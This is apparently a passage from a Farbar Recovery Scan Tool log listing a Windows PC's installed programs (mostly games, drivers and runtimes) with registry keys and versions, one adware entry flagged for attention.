Bing Bar (HKLM-x32\...\{3365E735-48A6-4194-9988-CE59AC5AE503}) (Version: 7.3.132.0 - Microsoft Corporation)
Black Ink (HKLM-x32\...\Black Ink 0.151.1634) (Version: 0.151.1634 - Bleank)
Black Ink (x32 Version: 0.151.1634 - Bleank) Hidden
Blue Satin Skin (HKLM-x32\...\{B0C00181-ECF5-4124-A6DE-14EA663D4799}) (Version: 2.2.0 - Screaming Bee)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version:  - Gearbox Software)
Burnout Paradise: The Ultimate Box (HKLM-x32\...\Steam App 24740) (Version:  - Criterion Games)
Carmageddon EFLC 2.0.1.1 (HKLM-x32\...\Carmageddon EFLC 2.0.1.1) (Version:  - )
Carmageddon Mod version 3.0.0.0 (HKLM-x32\...\{8A1CC0C6-88DB-44C6-B259-9EA8EE1BA96C}_is1) (Version: 3.0.0.0 - GiphtWorks)
CCleaner (HKLM\...\CCleaner) (Version: 4.18 - Piriform)
Comic Sound Pack (HKLM-x32\...\{79A743FA-FF99-42DF-8C35-BA40EAEA6668}) (Version: 2.1.0 - Screaming Bee)
Contagion (HKLM-x32\...\Steam App 238430) (Version:  - Monochrome LLC)
Corel Painter 13 - IPM (Version: 13.0 - Corel Corporation) Hidden
Corel Painter 13 - IPM Content (Version: 13.0 - Corel Corporation) Hidden
Counter-Strike: Global Offensive - SDK (HKLM-x32\...\Steam App 745) (Version:  - )
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Creatures of Darkness (HKLM-x32\...\{5B616A3F-43D9-4F0B-9F49-D39342A98592}) (Version: 3.3.0 - Screaming Bee LLC)
Creeper World 3 (HKLM\...\{9FF369E0-0274-4715-A348-1A222857BFCD}_is1) (Version:  - Knuckle Cracker, LLC)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.47.1.0333 - Disc Soft Ltd)
Dead Space (HKLM-x32\...\Steam App 17470) (Version:  - EA Redwood Shores)
Deep Space Voices (HKLM-x32\...\{336E1A2D-E3EB-4846-B7D0-BD75BBBBC0A4}) (Version: 3.3.0 - Screaming Bee)
DEFCON (HKLM-x32\...\Steam App 1520) (Version:  - Introversion Software)
Dishonored (HKLM-x32\...\Steam App 205100) (Version: 1.0 - Bethesda Softworks)
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
Dungeonland (HKLM-x32\...\Steam App 218130) (Version:  - Critical Studio)
Dxtory version 2.0.119 (HKLM-x32\...\Dxtory2.0_is1) (Version: 2.0.119 - Dxtory Software)
eManual (HKLM-x32\...\{0C84E634-EB68-4A54-B21E-A05EC87A4CC5}) (Version: 1.00.00 - ASUSTeK Computer Inc.)
Explorer Suite IV (HKLM\...\Explorer Suite_is1) (Version:  - )
f.lux (HKCU\...\Flux) (Version:  - )
Factorio version 0.9.8 (HKLM\...\Factorio_is1) (Version:  - )
Fallout New Vegas  1.4 (HKLM-x32\...\Fallout New Vegas_is1) (Version: 1.4 - Bethesda Softworks)
Fantasy Sound Pack (HKLM-x32\...\{06ACD0D6-537A-4831-9608-AA74A5795698}) (Version: 1.1.0 - Screaming Bee)
Far Cry 3 Blood Dragon (HKLM-x32\...\Far Cry 3 Blood Dragon_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Far Cry® 3 (HKLM-x32\...\Steam App 220240) (Version:  - Ubisoft Montreal, Massive Entertainment, and Ubisoft Shanghai)
Farm Animal Sounds (HKLM-x32\...\{20052CA0-FF43-4901-8261-E6DBF0A09ED1}) (Version: 1.1.0 - Screaming Bee)
FileASSASSIN (HKLM-x32\...\FileASSASSIN) (Version: 1.06 - Malwarebytes)
Fistful of Frags (HKLM-x32\...\Steam App 265630) (Version:  - Fistful of Frags Team)
Floating Point (HKLM-x32\...\Steam App 302380) (Version:  - Suspicious Developments)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Free Screen Video Recorder version 2.5.30.725 (HKLM-x32\...\Free Screen Video Recorder_is1) (Version: 2.5.30.725 - DVDVideoSoft Ltd.)
Frozen Synapse (HKLM-x32\...\Steam App 98200) (Version:  - )
FTL version 1.01 (HKLM-x32\...\{20E23A40-38E5-4DD6-B738-BC8097AE66B6}_is1) (Version: 1.01 - Subset Games)
Galactic Voices (HKLM-x32\...\{DF3FE308-58F2-45E2-9BB0-6A993794AD5C}) (Version: 1.3.0 - Screaming Bee)
Galería de fotos (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Galerie de photos (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
GameMaker: Studio (HKLM-x32\...\Steam App 214850) (Version:  - YoYo Games Ltd.)
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version:  - Garry)
Ghost Recon Online (NCSA-Live) (HKCU\...\fc418bf9b18f76aa) (Version: 1.30.8665.2 - Ubisoft)
GoldenEye: Source (HKLM-x32\...\GoldenEye Source) (Version: 4.2.3 - Team GoldenEye: Source)
GoldenEye: Source (HKLM-x32\...\GoldenEye: Source) (Version: 4.2 - Team GoldenEye: Source)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.104 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Grand Theft Auto IV (HKLM-x32\...\Steam App 12210) (Version:  - Rockstar North)
Grand Theft Auto IV (x32 Version: 1.0.0013.131 - Rockstar Games Inc.) Hidden
Grand Theft Auto: Episodes from Liberty City (HKLM-x32\...\Steam App 12220) (Version:  - Rockstar North / Toronto)
Grand Theft Auto: Episodes from Liberty City (x32 Version: 1.0.0002.135 - Rockstar Games Inc.) Hidden
GTA San Andreas (HKLM-x32\...\{D417C96A-FCC7-4590-A1BB-FAF73F5BC98E}) (Version: 1.00.00001 - Rockstar Games)
Gunpoint (HKLM-x32\...\Steam App 206190) (Version:  - Suspicious Developments)
Guns of Icarus Online (HKLM-x32\...\Steam App 209080) (Version:  - Muse Games)
HexEdit (HKLM-x32\...\{083EF76E-0760-4D7A-9508-0B88A3AF1889}) (Version: 4.0.0 - Expert Commercial Software Pty Ltd)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Hitman Absolution (HKLM-x32\...\Hitman Absolution_is1) (Version:  - )
Hitman Blood Money (HKLM-x32\...\{A804B134-F03D-4EFD-9BC0-DCD257AA1B22}) (Version: 1.00.0000 - Eidos)
IconHandler 64 bit (Version: 2.0 - Corel Corporation) Hidden
Inform 7 (HKLM-x32\...\Inform 7) (Version:  - )
iTunes (HKLM\...\{0225AD21-F3E2-4916-BFF3-65D3F9052582}) (Version: 11.0.2.26 - Apple Inc.)
Jack Claw (HKLM-x32\...\Jack Claw_is1) (Version:  - Frozenbyte, Inc.)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217045FF}) (Version: 7.0.670 - Oracle)
Java Auto Updater (x32 Version: 2.1.67.1 - Oracle, Inc.) Hidden
Just Cause 2 (HKLM-x32\...\Steam App 8190) (Version:  - Avalanche)
Just Cause 2: Multiplayer Mod (HKLM-x32\...\Steam App 259080) (Version:  - JC2-MP Team)
Kits Configuration Installer (x32 Version: 8.100.25984 - Microsoft) Hidden
L.A. Noire (HKLM-x32\...\Steam App 110800) (Version:  - Team Bondi)
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version:  - Valve)
Left 4 Dead 2 Authoring Tools (HKLM-x32\...\Steam App 563) (Version:  - Valve)
Left 4 Dead 2 Beta (HKLM-x32\...\Steam App 223530) (Version:  - )
Logitech SetPoint 6.65 (HKLM\...\sp6) (Version: 6.65.62 - Logitech)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.236 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.236 - LogMeIn, Inc.) Hidden
Magicite (HKLM-x32\...\Steam App 268750) (Version:  - SmashGames)
Magicka (HKLM-x32\...\Steam App 42910) (Version:  - Arrowhead Game Studios AB)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Mass Effect - Unification version 1.12 (HKLM-x32\...\{2CD83494-75D3-457B-A9EA-164377B56443}_is1) (Version: 1.12 - Frayed Wires Studios)
Mass Effect (HKLM-x32\...\{1B0FBB9A-995D-47cd-87CD-13E68B676E4F}) (Version: 1.00 - Electronic Arts, Inc.)
Mass Effect 2 (HKLM-x32\...\{75D84EF7-0D8C-4e70-B3FA-7B42A5D4E0EB}) (Version: 1.02 - Electronic Arts, Inc.)
Mass Effect™ 3 (HKLM-x32\...\{6A9D1594-7791-48f5-9CAA-DE9BCB968320}) (Version: 1.01.0.0 - Electronic Arts)
Men of War: Assault Squad (HKLM-x32\...\Steam App 64000) (Version:  - Digitalmindsoft)
Men of War: Red Tide (HKLM-x32\...\Steam App 3130) (Version:  - 1C Company)
Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft Chart Controls for Microsoft .NET Framework 3.5 (HKLM-x32\...\{41785C66-90F2-40CE-8CB5-1C94BFC97280}) (Version: 3.5.0.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{42AA4CA8-DCD8-4308-BCAB-0B6D75856A9D}) (Version: 3.5.95.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft Motocross Madness 2 (HKLM-x32\...\Motocross Madness 2) (Version:  - )
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Middle-earth: Shadow of Mordor (HKLM-x32\...\Steam App 241930) (Version:  - Monolith Productions, Inc.)
Modern Combat (HKLM-x32\...\Modern Combat 1.015) (Version: 1.015 - BSS Modern Combat Dev Team)
Modern Combat (x32 Version: 1.015 - BSS Modern Combat Dev Team) Hidden
MorphVOX Pro (HKLM-x32\...\{DE289787-7ECA-4BED-9D8C-99FAC407E3D6}) (Version: 4.3.13 - Screaming Bee)
Morrowind (HKLM-x32\...\{C325F588-D6B1-4A7F-B6A2-914C75DDA348}) (Version:  - )
Movie Maker (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Mozilla Firefox 29.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 29.0.1 (x86 en-US)) (Version: 29.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSI Afterburner 2.3.1 (HKLM-x32\...\Afterburner) (Version: 2.3.1 - MSI Co., LTD)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1108.0727 - Microsoft) Hidden
Multiwinia (HKLM-x32\...\Steam App 1530) (Version:  - Introversion Software)
Natural Selection 2 (HKLM-x32\...\Steam App 4920) (Version:  - Unknown Worlds Entertainment)
Nero 12 Essentials OEM.a01 (HKLM-x32\...\{2AC099EA-CC1C-4E4E-BDFC-0353DCF13DD0}) (Version: 12.5.00400 - Nero AG)
Nero ControlCenter (x32 Version: 11.0.15200 - Nero AG) Hidden
Nero ControlCenter Help (CHM) (x32 Version: 12.0.0003 - Nero AG) Hidden
Nero Core Components (x32 Version: 11.0.17800 - Nero AG) Hidden
Nero Express (x32 Version: 12.0.19000 - Nero AG) Hidden
Nero Express Help (CHM) (x32 Version: 12.0.1000 - Nero AG) Hidden
Nero Launcher (x32 Version: 12.2.2000 - Nero AG) Hidden
Nero Update (x32 Version: 11.0.11800.31.0 - Nero AG) Hidden
Next Car Game Technology Sneak Peek 2.0 (HKLM-x32\...\Next Car Game Technology Sneak Peek) (Version:  - Bugbear Entertainment)
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.52.1 - Black Tree Gaming)
Nidhogg (HKLM-x32\...\Steam App 94400) (Version:  - Messhof)
No More Room in Hell (HKLM-x32\...\Steam App 224260) (Version:  - No More Room in Hell Team)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6 - Notepad++ Team)
NVIDIA 3D Vision Controller Driver 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 337.88 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 337.88 - NVIDIA Corporation)
NVIDIA Control Panel 337.88 (Version: 337.88 - NVIDIA Corporation) Hidden
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 337.88 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
NVIDIA Install Application (Version: 2.1002.157.1165 - NVIDIA Corporation) Hidden
NVIDIA LED Visualizer 1.0 (Version: 1.0 - NVIDIA Corporation) Hidden
NVIDIA Network Service (Version: 1.0 - NVIDIA Corporation) Hidden
NVIDIA PhysX (x32 Version: 9.13.1220 - NVIDIA Corporation) Hidden
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
NVIDIA ShadowPlay 15.3.33 (Version: 15.3.33 - NVIDIA Corporation) Hidden
NVIDIA Stereoscopic 3D Driver (x32 Version: 7.17.12.6514 - NVIDIA Corporation) Hidden
NVIDIA Update 15.3.33 (Version: 15.3.33 - NVIDIA Corporation) Hidden
NVIDIA Update Core (Version: 15.3.33 - NVIDIA Corporation) Hidden
NVIDIA Virtual Audio 1.2.23 (Version: 1.2.23 - NVIDIA Corporation) Hidden
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Origin (HKLM-x32\...\Origin) (Version: 9.3.1.4482 - Electronic Arts, Inc.)
PA Mod Manager 3.4.0 (HKLM-x32\...\PA Mod Manager) (Version: 3.4.0 - Raevn)
paint.net (HKLM\...\{F509C1F4-0029-49F9-B145-A4C4E8DF481A}) (Version: 4.0.3 - dotPDN LLC)
Painter 13 - Contentx64 (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - Core (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - Corex64 (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - EN (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - Setup Files (Version: 13.0 - Corel Corporation) Hidden
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version:  - OVERKILL - a Starbreeze Studio.)
PAYDAY: The Heist (HKLM-x32\...\Steam App 24240) (Version:  - OVERKILL Software)
Photo Common (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Plague Inc Evolved (HKLM-x32\...\Plague Inc Evolved_is1) (Version: 0.7.5.1 - Decepticon)
PlanetSide 2 (HKCU\...\SOE-PlanetSide 2) (Version:  - Sony Online Entertainment)
PlanetSide 2 (HKLM-x32\...\Steam App 218230) (Version:  - Sony Online Entertainment)
Play withSIX (HKLM-x32\...\{D7F3EEAD-183C-47DE-BDC5-593539573F97}) (Version: 1.30.0476 - SIX Networks)
Portal 2 (HKLM-x32\...\Steam App 620) (Version:  - Valve)
Portal 2 Authoring Tools - Beta (HKLM-x32\...\Steam App 629) (Version:  - Valve)
Portal 2 Publishing Tool (HKLM-x32\...\Steam App 644) (Version:  - )
Prerequisite installer (x32 Version: 12.0.0002 - Nero AG) Hidden
Process Hacker 2.33 (r5590) (HKLM\...\Process_Hacker2_is1) (Version: 2.33.0.5590 - wj32)
Project Zomboid (HKLM-x32\...\Steam App 108600) (Version:  - The Indie Stone)
Psychonauts (HKLM-x32\...\Steam App 3830) (Version:  - Double Fine Productions)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Quake Live Mozilla Plugin (HKLM-x32\...\{FA66CFD7-0977-4C45-AACD-A8BB994B1A05}) (Version: 1.0.520 - id Software)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 3.1 beta r2280 - )
Razer Comms (HKLM-x32\...\Razer Comms) (Version: 2.0 - Razer Inc.)
Razer Game Booster (HKLM-x32\...\Razer Game Booster_is1) (Version: 4.0.68.0 - Razer Inc.)
Razer Surround (HKLM-x32\...\Razer Surround) (Version: 1.05.10 - Razer Inc.)
Razer Synapse 2.0 (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.15.20888 - Razer Inc.)
RealDownloader (x32 Version: 17.0.12 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.12 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6657 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Red Faction: Guerrilla  (HKLM-x32\...\Steam App 20500) (Version:  - Volition)
ROBLOX Player for RaRWolf (HKCU\...\{373B1718-8CC5-4567-8EE2-9033AD08A680}) (Version:  - ROBLOX Corporation)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.0.6 - Rockstar Games)
Rodina (HKLM-x32\...\{0B7E56F5-D39D-4A41-B3A0-D60886044041}) (Version: 1.1.0 - Elliptic Games)
Roleplaying City Map Generator (HKLM-x32\...\{3B585A53-CC41-4969-A7CB-F0E5D34ACA08}) (Version: 4.5.0.0 - )
RollerCoaster Tycoon 3: Platinum! (HKLM-x32\...\Steam App 2700) (Version:  - Frontier)
Running With Rifles 0.98.4 (HKLM-x32\...\Running With Rifles 0.98.4) (Version: 0.98.4 - Èãðû íà Cat-A-Cat.NET)
RUNNING WITH RIFLES Demo version 0.76 (HKLM-x32\...\{5ABD42BC-4DDD-48C7-9951-48B31F27EC39}_is1) (Version: 0.76 - Modulaatio Games)
Running with rifles version 0.95 (HKLM-x32\...\{E2948988-2C6C-4070-BC8B-A1D77FE97D09}_is1) (Version: 0.95 - Modulaatio Games)
Rust (HKLM-x32\...\{E3948799-9E75-4704-8E36-071C43A2750C}) (Version: 19.12.2013 - Facepunch)
Saints Row 2 (HKLM-x32\...\Steam App 9480) (Version:  - Volition)
Sci-Fi 2 Sound Pack (HKLM-x32\...\{E7E76513-335F-4995-86CF-A85B77D8D975}) (Version: 1.3.0 - Screaming Bee)
Sci-Fi Sound Pack (HKLM-x32\...\{D13F2D95-1CE0-4147-846F-89ECB2E9A5CD}) (Version: 1.1.0 - Screaming Bee)
SDK Debuggers (x32 Version: 8.100.26629 - Microsoft Corporation) Hidden
Search Protection (HKCU\...\Search Protection) (Version: 7.5.0.1 - Spigot, Inc.) <==== ATTENTION
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Sid Meier's Civilization 5 (HKLM-x32\...\Sid Meier's Civilization 5_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, Panky)
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version:  - 2K Games, Inc.)
Six Updater (HKLM-x32\...\{2D8CED57-CCDB-4D86-9087-3BBCAE8F8F22}) (Version: 2.09.7038 - Six Projects)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.21 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.21.104 - Skype Technologies S.A.)
Sleeping Dogs™ (HKLM-x32\...\Steam App 202170) (Version:  - United Front Games)
Source SDK (HKLM-x32\...\Steam App 211) (Version:  - Valve)
Source SDK Base 2006 (HKLM-x32\...\Steam App 215) (Version:  - Valve)
Source SDK Base 2007 (HKLM-x32\...\Steam App 218) (Version:  - Valve)
Space Engineers (HKLM-x32\...\Steam App 244850) (Version:  - )
Space Engineers Toolbox (HKLM-x32\...\{60079798-AEE7-48FD-B642-810D3D1B2C26}) (Version: 01.039.010.1 - Mid-Space Productions)
Split/Second (HKLM-x32\...\{28526951-55EF-4901-A0CA-B9AC966D1DD1}) (Version: 1.00.0000 - Disney Interactive Studios)
Spooky Sounds (HKLM-x32\...\{D813EF9B-69CF-4996-893C-B400AE7292FA}) (Version: 2.1.0 - Screaming Bee)
Spore (HKLM-x32\...\Steam App 17390) (Version:  - Maxis)
Square Enix Secure Launcher (HKCU\...\Square Enix Secure Launcher) (Version: 1.0.0.108 - Square Enix)
Stacking (HKLM-x32\...\Steam App 115110) (Version:  - )
Star Wars Battlefront (HKLM-x32\...\{C79CB9C7-10A4-4814-8402-F574672C2192}) (Version: 1.0 - LucasArts)
Star Wars Battlefront II (HKLM-x32\...\{3D374523-CFDE-461A-827E-2A102E2AB365}) (Version: 1.0 - LucasArts)
Star wars Battlefront II version 1.3 (HKLM-x32\...\{2EF34761-F147-4984-8AF1-BB9F8DA76CDD}_is1) (Version: 1.3 - )
Star Wars Empire at War (HKLM-x32\...\{99AE7207-8612-4DBA-A8F8-BAE5C633390D}) (Version: 1.0 - LucasArts)
Starbound (HKLM-x32\...\Steam App 211820) (Version:  - )
StarForge Alpha (HKLM-x32\...\Steam App 227680) (Version:  - )
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Stykz for Windows 1.0.2 (HKLM-x32\...\{7E44C354-10A8-4214-9C56-F3F00775E415}_is1) (Version: 1.0.2 - Sons of Thunder Software, Inc.)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
System Requirements Lab CYRI (HKLM-x32\...\{F3FCB08B-E752-444D-86A0-0634A4F3B23D}) (Version: 6.0.8.0 - Husdawg, LLC)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version:  - Valve)
TeamSpeak 2 RC2 (HKLM-x32\...\Teamspeak 2 RC2_is1) (Version: 2.0.32.60 - Dominating Bytes Design)
TeamSpeak 2 Server RC2 (HKLM-x32\...\TeamSpeak 2 Server_is1) (Version: 2.0.23.19 - TeamSpeak Systems)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.13.1 - TeamSpeak Systems GmbH)
Terraria version 1.2.4.1 (HKLM-x32\...\{1520E069-19A9-4B01-BA5D-87B67D56F55D}_is1) (Version: 1.2.4.1 - )
TES Construction Set (HKLM-x32\...\{DB3C800B-081B-4146-B4E3-EFB5B77AA913}) (Version:  - )
The Ship Single Player (HKLM-x32\...\Steam App 2420) (Version:  - Outerlight Ltd.)
The Showdown Effect (HKLM-x32\...\Steam App 204080) (Version:  - Arrowhead Game Studios)
The Sims™ 3 (HKLM-x32\...\{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}) (Version: 1.67.2 - Electronic Arts)
The Sims™ 3 Create a World Tool - Beta (HKLM-x32\...\{65761BAE-11E8-48FE-B30F-1F01011AB906}) (Version: 1.19.6 - Electronic Arts)
The Sims™ 3 High-End Loft Stuff (HKLM-x32\...\{71828142-5A24-4BD0-97E7-976DA08CE6CF}) (Version: 3.0.38 - Electronic Arts)
The Sims™ 3 Late Night (HKLM-x32\...\{45057FCE-5784-48BE-8176-D9D00AF56C3C}) (Version: 6.5.1 - Electronic Arts)
The Witcher Enhanced Edition (HKLM-x32\...\{F138762F-5A1F-4CF0-A5E1-1588EF6088A4}) (Version: 1.00.0000 - CD Projekt Red)
Tiny and Big: Grandpa's Leftovers (HKLM-x32\...\Steam App 205910) (Version:  - Black Pants Game Studio)
Tom Clancy's Splinter Cell Chaos Theory (HKLM-x32\...\{888DD888-82BE-4D85-BCB2-2E042CD3E844}) (Version: 1.05.157 - Ubisoft)
Tom Clancy's Splinter Cell Conviction (HKLM-x32\...\{6D8DDB4A-C263-40DE-BA16-AFDAD159D59A}) (Version: 1.00.000 - Ubisoft)
Tom Clancy's Splinter Cell® Blacklist™ (HKLM-x32\...\{A6356F2F-D3E1-4D83-9AA2-72871DD0C298}) (Version: 1.00.1000 - Ubisoft)
Tomb Raider III (HKLM-x32\...\Tomb Raider III) (Version:  - )
